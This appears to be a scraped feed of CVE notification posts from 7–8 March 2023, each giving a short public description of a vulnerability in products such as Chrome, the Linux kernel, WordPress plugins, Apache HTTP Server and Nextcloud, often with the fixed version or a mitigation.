🚨 CVE-2023-26956onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/curd/code.🎖@cveNotify |
|
| 2023-03-08 22:29:44 |
🚨 CVE-2023-27486xCAT is a toolkit for deployment and administration of computer clusters. In versions prior to 2.16.5 if zones are configured as a mechanism to secure clusters in XCAT, it is possible for a local root user from one node to obtain credentials to SSH to any node in any zone, except the management node of the default zone. XCAT zones are not enabled by default. Only users that use the optional zone feature are impacted. All versions of xCAT prior to xCAT 2.16.5 are vulnerable. This problem has been fixed in xCAT 2.16.5. Users making use of zones should upgrade to 2.16.5. Users unable to upgrade may mitigate the issue by disabling zones or patching the management node with the fix contained in commit `85149c37f49`.🎖@cveNotify |
|
| 2023-03-08 22:29:40 |
🚨 CVE-2023-1275A vulnerability classified as problematic was found in SourceCodester Phone Shop Sales Managements System 1.0. This vulnerability affects unknown code of the file /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php of the component CAPTCHA Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-08 22:29:39 |
🚨 CVE-2023-27482homeassistant is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered. This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected. The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet.🎖@cveNotify |
|
| 2023-03-08 22:29:38 |
🚨 CVE-2023-24773Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/list.🎖@cveNotify |
|
| 2023-03-08 20:30:04 |
🚨 CVE-2022-3884Incorrect Default Permissions vulnerability in Hitachi Ops Center Analyzer on Windows (Hitachi Ops Center Analyzer RAID Agent component) allows local users to read and write specific files.This issue affects Hitachi Ops Center Analyzer: from 10.9.0-00 before 10.9.0-01.🎖@cveNotify |
|
| 2023-03-08 20:30:03 |
🚨 CVE-2023-22995In the Linux kernel before 5.17, an error path in dwc3_qcom_acpi_register_core in drivers/usb/dwc3/dwc3-qcom.c lacks certain platform_device_put and kfree calls.🎖@cveNotify |
|
| 2023-03-08 20:30:02 |
🚨 CVE-2023-1275A vulnerability classified as problematic was found in SourceCodester Phone Shop Sales Managements System 1.0. This vulnerability affects unknown code of the file /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php of the component CAPTCHA Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-08 20:29:59 |
🚨 CVE-2023-27482homeassistant is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered. This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected. The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet.🎖@cveNotify |
|
| 2023-03-08 20:29:58 |
🚨 CVE-2022-43945The Linux kernel NFSD implementation prior to versions 5.19.17 and 6.0.2 are vulnerable to buffer overflow. NFSD tracks the number of pages held by each NFSD thread by combining the receive and send buffers of a remote procedure call (RPC) into a single array of pages. A client can force the send buffer to shrink by sending an RPC message over TCP with garbage data added at the end of the message. The RPC message with garbage data is still correctly formed according to the specification and is passed forward to handlers. Vulnerable code in NFSD is not expecting the oversized request and writes beyond the allocated buffer space. CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H🎖@cveNotify |
|
| 2023-03-08 20:29:57 |
🚨 CVE-2023-1080The GN Publisher plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘tab’ parameter in versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-08 20:29:53 |
🚨 CVE-2022-46712A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13. An app may be able to cause unexpected system termination or potentially execute code with kernel privileges.🎖@cveNotify |
|
| 2023-03-08 20:29:52 |
🚨 CVE-2023-25768A missing permission check in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers with Overall/Read permission to connect to an attacker-specified web server.🎖@cveNotify |
|
| 2023-03-08 20:29:51 |
🚨 CVE-2023-1055A flaw was found in RHDS 11 and RHDS 12. While browsing entries LDAP tries to decode the userPassword attribute instead of the userCertificate attribute which could lead into sensitive information leaked. An attacker with a local account where the cockpit-389-ds is running can list the processes and display the hashed passwords. The highest threat from this vulnerability is to data confidentiality.🎖@cveNotify |
|
| 2023-03-08 20:29:48 |
🚨 CVE-2015-10086A vulnerability, which was classified as critical, was found in OpenCycleCompass server-php. Affected is an unknown function of the file api1/login.php. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is fa0d9bcf81c711a88172ad0d37a842f029ac3782. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-221808.🎖@cveNotify |
|
| 2023-03-08 20:29:47 |
🚨 CVE-2023-24830Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB.This issue affects iotdb-web-workbench component: from 0.13.0 before 0.13.3.🎖@cveNotify |
|
| 2023-03-08 20:29:46 |
🚨 CVE-2023-26041Nextcloud Talk is a fully on-premises audio/video and chat communication service. When cron jobs were misconfigured and therefore messages are not expired, the API would still return them while they were then hidden by the frontend code. It is recommended that the Nextcloud Talk is upgraded to 15.0.3. There are no workaround available.🎖@cveNotify |
|
| 2023-03-08 18:29:50 |
🚨 CVE-2023-23524A denial-of-service issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.2.1, iOS 16.3.1 and iPadOS 16.3.1, tvOS 16.3.2, watchOS 9.3.1. Processing a maliciously crafted certificate may lead to a denial-of-service.🎖@cveNotify |
|
| 2023-03-08 18:29:43 |
🚨 CVE-2022-3792Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GullsEye GullsEye terminal operating system allows SQL Injection.This issue affects GullsEye terminal operating system: from unspecified before 5.0.13.🎖@cveNotify |
|
| 2023-03-08 18:29:42 |
🚨 CVE-2022-22668A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A malicious application may be able to leak sensitive user information.🎖@cveNotify |
|
| 2023-03-08 16:29:56 |
🚨 CVE-2023-1214Type confusion in V8 in Google Chrome prior to 111.0.5563.64 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-08 16:29:55 |
🚨 CVE-2023-1215Type confusion in CSS in Google Chrome prior to 111.0.5563.64 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-08 16:29:54 |
🚨 CVE-2023-1217Stack buffer overflow in Crash reporting in Google Chrome on Windows prior to 111.0.5563.64 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-08 16:29:53 |
🚨 CVE-2023-1218Use after free in WebRTC in Google Chrome prior to 111.0.5563.64 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-08 16:29:50 |
🚨 CVE-2023-1219Heap buffer overflow in Metrics in Google Chrome prior to 111.0.5563.64 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-08 16:29:49 |
🚨 CVE-2023-1221Insufficient policy enforcement in Extensions API in Google Chrome prior to 111.0.5563.64 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-03-08 16:29:48 |
🚨 CVE-2023-1223Insufficient policy enforcement in Autofill in Google Chrome on Android prior to 111.0.5563.64 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-03-08 16:29:44 |
🚨 CVE-2023-1224Insufficient policy enforcement in Web Payments API in Google Chrome prior to 111.0.5563.64 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-03-08 16:29:43 |
🚨 CVE-2023-1225Insufficient policy enforcement in Navigation in Google Chrome on iOS prior to 111.0.5563.64 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-03-08 16:29:42 |
🚨 CVE-2023-1228Insufficient policy enforcement in Intents in Google Chrome on Android prior to 111.0.5563.64 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-03-08 16:29:38 |
🚨 CVE-2023-1230Inappropriate implementation in WebApp Installs in Google Chrome on Android prior to 111.0.5563.64 allowed an attacker who convinced a user to install a malicious WebApp to spoof the contents of the PWA installer via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-03-08 16:29:37 |
🚨 CVE-2023-1232Insufficient policy enforcement in Resource Timing in Google Chrome prior to 111.0.5563.64 allowed a remote attacker to obtain potentially sensitive information from API via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-03-08 16:29:36 |
🚨 CVE-2023-1233Insufficient policy enforcement in Resource Timing in Google Chrome prior to 111.0.5563.64 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from API via a crafted Chrome Extension. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-03-07 22:29:49 |
🚨 CVE-2023-27480XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with edit rights on a document can trigger an XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host. This vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1. Users are advised to upgrade. Users unable to upgrade may apply the patch `e3527b98fd` manually.🎖@cveNotify |
|
| 2023-03-07 22:29:48 |
🚨 CVE-2023-27485thmmniii/fbs-core is an open source feedback system for students. In versions prior to 1.5.3 when querying `subresults`, it is possible to query `subresults` from other users due to insufficient authorisation. This is only possible for logged-in users and it is not possible to associate the subresults with a specific user. This bug was fixed in commit `f1ae67d8bb2`and released with version 1.5.3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-03-07 22:29:44 |
🚨 CVE-2020-9846A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to access local users' Apple IDs.🎖@cveNotify |
|
| 2023-03-07 22:29:43 |
🚨 CVE-2023-24249An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.🎖@cveNotify |
|
| 2023-03-07 22:29:42 |
🚨 CVE-2023-1048A vulnerability, which was classified as critical, has been found in TechPowerUp Ryzen DRAM Calculator 1.2.0.5. This issue affects some unknown processing in the library WinRing0x64.sys. The manipulation leads to improper initialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221807.🎖@cveNotify |
|
| 2023-03-07 22:29:38 |
🚨 CVE-2022-48284A piece of Huawei whole-home intelligence software has an Incorrect Privilege Assignment vulnerability. Successful exploitation of this vulnerability could allow attackers to access restricted functions.🎖@cveNotify |
|
| 2023-03-07 22:29:37 |
🚨 CVE-2022-48283A piece of Huawei whole-home intelligence software has an Incorrect Privilege Assignment vulnerability. Successful exploitation of this vulnerability could allow attackers to access restricted functions.🎖@cveNotify |
|
| 2023-03-07 22:29:36 |
🚨 CVE-2023-26091The frp_form_answers (aka Forms Export) extension before 3.1.2, and 4.x before 4.0.2, for TYPO3 allows XSS via saved emails.🎖@cveNotify |
|
| 2023-03-07 20:29:36 |
🚨 CVE-2023-25605A improper access control vulnerability in Fortinet FortiSOAR 7.3.0 - 7.3.1 allows an attacker authenticated on the administrative interface to perform unauthorized actions via crafted HTTP requests.🎖@cveNotify |
|
| 2023-03-07 18:29:55 |
🚨 CVE-2023-26039ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an OS Command Injection via daemonControl() in (/web/api/app/Controller/HostController.php). Any authenticated user can construct an api command to execute any shell command as the web user. This issue is patched in versions 1.36.33 and 1.37.33.🎖@cveNotify |
|
| 2023-03-07 18:29:54 |
🚨 CVE-2023-25816Nextcloud is an Open Source private cloud software. Versions 25.0.0 and above, prior to 25.0.3, are subject to Uncontrolled Resource Consumption. A user can configure a very long password, consuming more resources on password validation than desired. This issue is patched in 25.0.3 No workaround is available.🎖@cveNotify |
|
| 2023-03-07 18:29:53 |
🚨 CVE-2021-4332The Plus Addons for Elementor plugin for WordPress is vulnerable to arbitrary file reads in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin has a feature to add an "Info Box" to an Elementor created page. This Info Box can include an SVG image for the box. Unfortunately, the plugin used file_get_contents with no verification that the file being supplied was an SVG file, so any user with access to the Elementor page builder, such as contributors, could read arbitrary files on the WordPress installation.🎖@cveNotify |
|
| 2023-03-07 18:29:49 |
🚨 CVE-2021-4333The WP Statistics plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 13.1.1. This is due to missing or incorrect nonce validation on the view() function. This makes it possible for unauthenticated attackers to activate and deactivate arbitrary plugins, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-07 18:29:48 |
🚨 CVE-2022-4932The Total Upkeep plugin for WordPress is vulnerable to information disclosure in versions up to, and including 1.14.13. This is due to missing authorization on the heartbeat_received() function that triggers on WordPress heartbeat. This makes it possible for authenticated attackers, with subscriber-level permissions and above to retrieve back-up paths that can subsequently be used to download the back-up.🎖@cveNotify |
|
| 2023-03-07 18:29:47 |
🚨 CVE-2023-1254A vulnerability has been found in SourceCodester Health Center Patient Record Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file birthing_print.php. The manipulation of the argument birth_id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222484.🎖@cveNotify |
|
| 2023-03-07 18:29:43 |
🚨 CVE-2023-26953onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Administrator module.🎖@cveNotify |
|
| 2023-03-07 18:29:42 |
🚨 CVE-2023-25690Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like: RewriteEngine on RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/ http://example.com:8080/ Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.🎖@cveNotify |
|
| 2023-03-07 18:29:41 |
🚨 CVE-2023-27522HTTP Response Smuggling vulnerability in Apache HTTP Server via mod_proxy_uwsgi. This issue affects Apache HTTP Server: from 2.4.30 through 2.4.55. Special characters in the origin response header can truncate/split the response forwarded to the client.🎖@cveNotify |
|
| 2023-03-07 18:29:37 |
🚨 CVE-2023-26780CleverStupidDog yf-exam v 1.8.0 is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-03-07 18:29:36 |
🚨 CVE-2016-15024A vulnerability was found in doomsider shadow. It has been classified as problematic. Affected is an unknown function. The manipulation leads to denial of service. Attacking locally is a requirement. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The name of the patch is 3332c5ba9ec3014ddc74e2147190a050eee97bc0. It is recommended to apply a patch to fix this issue. VDB-221478 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-07 15:30:03 |
🚨 CVE-2021-3329Lack of proper validation in HCI Host stack initialization can cause a crash of the bluetooth stack🎖@cveNotify |
|
| 2023-03-07 15:29:59 |
🚨 CVE-2020-36667The JetBackup – WP Backup, Migrate & Restore plugin for WordPress is vulnerable to unauthorized back-up location changes in versions up to, and including 1.4.1 due to a lack of proper capability checking on the backup_guard_cloud_dropbox, backup_guard_cloud_gdrive, and backup_guard_cloud_oneDrive functions. This makes it possible for authenticated attackers, with minimal permissions, such as a subscriber to change to location of back-ups and potentially steal sensitive information from them.🎖@cveNotify |
|
| 2023-03-07 15:29:58 |
🚨 CVE-2020-36668The JetBackup – WP Backup, Migrate & Restore plugin for WordPress is vulnerable to sensitive information disclosure in versions up to, and including, 1.4.0 due to a lack of proper capability checking on the backup_guard_get_manual_modal function called via an AJAX action. This makes it possible for subscriber-level attackers, and above, to invoke the function and obtain database table information.🎖@cveNotify |
|
| 2023-03-07 15:29:57 |
🚨 CVE-2020-36669The JetBackup – WP Backup, Migrate & Restore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including 1.3.9. This is due to missing nonce validation on the backup_guard_get_import_backup() function. This makes it possible for unauthenticated attackers to upload arbitrary files to the vulnerable site's server via a forged request, granted they can trick a site's administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-07 15:29:56 |
🚨 CVE-2021-44197Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in UBIT Information Technologies Student Information Management System.This issue affects Student Information Management System: before 20211126.🎖@cveNotify |
|
| 2023-03-07 15:29:51 |
🚨 CVE-2021-4330The Envato Elements & Download and Template Kit – Import plugins for WordPress are vulnerable to arbitrary file uploads due to insufficient validation of file type upon extracting uploaded Zip files in the installFreeTemplateKit and uploadTemplateKitZipFile functions. This makes it possible for attackers with contributor-lever permissions and above to upload arbitrary files and potentially gain remote code execution in versions up to and including 1.0.13 of Template Kit – Import and versions up to and including 2.0.10 of Envato Elements & Download.🎖@cveNotify |
|
| 2023-03-07 15:29:50 |
🚨 CVE-2023-23109In crasm 1.8-3, invalid input validation, specific files passed to the command line application, can lead to a divide by zero fault in the function opdiv.🎖@cveNotify |
|
| 2023-03-07 15:29:49 |
🚨 CVE-2023-26955onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Admin Group module.🎖@cveNotify |
|
| 2023-03-07 15:29:48 |
🚨 CVE-2023-1237Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:47 |
🚨 CVE-2023-1238Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:46 |
🚨 CVE-2023-1239Cross-site Scripting (XSS) - Reflected in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:45 |
🚨 CVE-2023-1240Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:44 |
🚨 CVE-2023-1241Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:42 |
🚨 CVE-2023-1242Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:41 |
🚨 CVE-2023-1243Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:39 |
🚨 CVE-2023-1244Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:37 |
🚨 CVE-2023-1245Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 15:29:36 |
🚨 CVE-2022-3760Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mia Technology Mia-Med.This issue affects Mia-Med: before 1.0.0.58.🎖@cveNotify |
|
| 2023-03-07 12:29:52 |
🚨 CVE-2023-1247Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 11.0.0.🎖@cveNotify |
|
| 2023-03-07 12:29:49 |
🚨 CVE-2022-3760Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mia Technology Mia-Med.This issue affects Mia-Med: before 1.0.0.58.🎖@cveNotify |
|
| 2023-03-07 12:29:48 |
🚨 CVE-2023-1237Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 12:29:47 |
🚨 CVE-2023-1239Cross-site Scripting (XSS) - Reflected in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 12:29:46 |
🚨 CVE-2023-1240Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 12:29:43 |
🚨 CVE-2023-1241Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 12:29:42 |
🚨 CVE-2023-1242Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 12:29:41 |
🚨 CVE-2023-1244Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 12:29:40 |
🚨 CVE-2023-1245Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-07 07:29:54 |
🚨 CVE-2023-22895The bzip2 crate before 0.4.4 for Rust allow attackers to cause a denial of service via a large file that triggers an integer overflow in mem.rs. NOTE: this is unrelated to the https://crates.io/crates/bzip2-rs product.🎖@cveNotify |
|
| 2023-03-07 07:29:53 |
🚨 CVE-2022-37454The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.🎖@cveNotify |
|
| 2023-03-07 07:29:51 |
🚨 CVE-2021-35370An issue found in Peacexie Imcat v5.4 allows attackers to execute arbitrary code via the incomplete filtering function.🎖@cveNotify |
|
| 2023-03-07 07:29:50 |
🚨 CVE-2023-26103Versions of the package deno before 1.31.0 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the upgradeWebSocket function, which contains regexes in the form of /s*,s*/, used for splitting the Connection/Upgrade header. A specially crafted Connection/Upgrade header can be used to significantly slow down a web socket server.🎖@cveNotify |
|
| 2023-03-07 07:29:49 |
🚨 CVE-2022-40237IBM MQ for HPE NonStop 8.1.0 is vulnerable to a denial of service attack due to an error within the CCDT and channel synchronization logic. IBM X-Force ID: 235727.🎖@cveNotify |
|
| 2023-03-07 07:29:48 |
🚨 CVE-2023-22860IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 244100.🎖@cveNotify |
|
| 2023-03-07 07:29:47 |
🚨 CVE-2022-44310In Development IL ecdh before 0.2.0, an attacker can send an invalid point (not on the curve) as the public key, and obtain the derived shared secret.🎖@cveNotify |
|
| 2023-03-07 07:29:45 |
🚨 CVE-2023-23205An issue was discovered in lib60870 v2.3.2. There is a memory leak in lib60870/lib60870-C/examples/multi_client_server/multi_client_server.c.🎖@cveNotify |
|
| 2023-03-07 07:29:44 |
🚨 CVE-2023-26104All versions of the package lite-web-server are vulnerable to Denial of Service (DoS) when an attacker sends an HTTP request and includes control characters that the decodeURI() function is unable to parse.🎖@cveNotify |
|
| 2023-03-07 07:29:43 |
🚨 CVE-2023-25821Nextcloud is an Open Source private cloud software. Versions 24.0.4 and above, prior to 24.0.7, and 25.0.0 and above, prior to 25.0.1, contain Improper Access Control. Secure view for internal shares can be circumvented if reshare permissions are also given. This issue is patched in versions 24.0.7 and 25.0.1. No workaround is available.🎖@cveNotify |
|
| 2023-03-07 07:29:42 |
🚨 CVE-2023-1033Cross-Site Request Forgery (CSRF) in GitHub repository froxlor/froxlor prior to 2.0.11.🎖@cveNotify |
|
| 2023-03-07 07:29:41 |
🚨 CVE-2021-35290File Upload vulnerability in balerocms-src 0.8.3 allows remote attackers to run arbitrary code via rich text editor on /admin/main/mod-blog page.🎖@cveNotify |
|
| 2023-03-07 07:29:40 |
🚨 CVE-2023-0481In RestEasy Reactive implementation of Quarkus the insecure File.createTempFile() is used in the FileBodyHandler class which creates temp files with insecure permissions that could be read by a local user.🎖@cveNotify |
|
| 2023-03-07 07:29:39 |
🚨 CVE-2023-22847Information disclosure vulnerability exists in pg_ivm versions prior to 1.5.1. An Incrementally Maintainable Materialized View (IMMV) created by pg_ivm may reflect rows with Row-Level Security that the owner of the IMMV should not have access to. As a result, information in tables protected by Row-Level Security may be retrieved by a user who is not authorized to access it.🎖@cveNotify |
|
| 2023-03-07 07:29:38 |
🚨 CVE-2023-23554Uncontrolled search path element vulnerability exists in pg_ivm versions prior to 1.5.1. When refreshing an IMMV, pg_ivm executes functions without specifying schema names. Under certain conditions, pg_ivm may be tricked to execute unexpected functions from other schemas with the IMMV owner's privilege. If this vulnerability is exploited, an unexpected function provided by an attacker may be executed with the privilege of the materialized view owner.🎖@cveNotify |
|
| 2023-03-07 02:30:51 |
🚨 CVE-2017-20181A vulnerability classified as critical was found in hgzojer Vocable Trainer up to 1.3.0. This vulnerability affects unknown code of the file src/at/hgz/vocabletrainer/VocableTrainerProvider.java. The manipulation leads to path traversal. Attacking locally is a requirement. Upgrading to version 1.3.1 is able to address this issue. The name of the patch is accf6838078f8eb105cfc7865aba5c705fb68426. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222328.🎖@cveNotify |
|
| 2023-03-07 02:30:49 |
🚨 CVE-2023-1211SQL Injection in GitHub repository phpipam/phpipam prior to v1.5.2.🎖@cveNotify |
|
| 2023-03-07 02:30:48 |
🚨 CVE-2023-1212Cross-site Scripting (XSS) - Stored in GitHub repository phpipam/phpipam prior to v1.5.2.🎖@cveNotify |
|
| 2023-03-07 02:30:46 |
🚨 CVE-2022-36369Improper access control in some QATzip software maintained by Intel(R) before version 1.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-07 02:30:45 |
🚨 CVE-2008-10004A vulnerability was found in Email Registration 5.x-2.1. It has been declared as critical. This vulnerability affects the function email_registration_user of the file email_registration.module. The manipulation of the argument namenew leads to sql injection. The attack can be initiated remotely. Upgrading to version 6.x-1.0 is able to address this issue. The name of the patch is 126c141b7db038c778a2dc931d38766aad8d1112. It is recommended to upgrade the affected component. VDB-222334 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-07 02:30:44 |
🚨 CVE-2019-8720A vulnerability was found in WebKit. The flaw is triggered when processing maliciously crafted web content that may lead to arbitrary code execution. Improved memory handling addresses the multiple memory corruption issues.🎖@cveNotify |
|
| 2023-03-07 02:30:42 |
🚨 CVE-2021-20251A flaw was found in samba. A race condition in the password lockout code may lead to the risk of brute force attacks being successful if special conditions are met.🎖@cveNotify |
|
| 2023-03-07 02:30:41 |
🚨 CVE-2021-36402In Moodle, Users' names required additional sanitizing in the account confirmation email, to prevent a self-registration phishing risk.🎖@cveNotify |
|
| 2023-03-07 02:30:39 |
🚨 CVE-2021-36403In Moodle, in some circumstances, email notifications of messages could have the link back to the original message hidden by HTML, which may pose a phishing risk.🎖@cveNotify |
|
| 2023-03-07 02:30:38 |
🚨 CVE-2022-3277An uncontrolled resource consumption flaw was found in openstack-neutron. This flaw allows a remote authenticated user to query a list of security groups for an invalid project. This issue creates resources that are unconstrained by the user's quota. If a malicious user were to submit a significant number of requests, this could lead to a denial of service.🎖@cveNotify |
|
| 2023-03-07 02:30:33 |
🚨 CVE-2022-3424A use-after-free flaw was found in the Linux kernel’s SGI GRU driver in the way the first gru_file_unlocked_ioctl function is called by the user, where a fail pass occurs in the gru_check_chiplet_assignment function. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-03-07 02:30:31 |
🚨 CVE-2022-3707A double-free memory flaw was found in the Linux kernel. The Intel GVT-g graphics driver triggers VGA card system resource overload, causing a fail in the intel_gvt_dma_map_guest_page function. This issue could allow a local user to crash the system.🎖@cveNotify |
|
| 2023-03-07 02:30:30 |
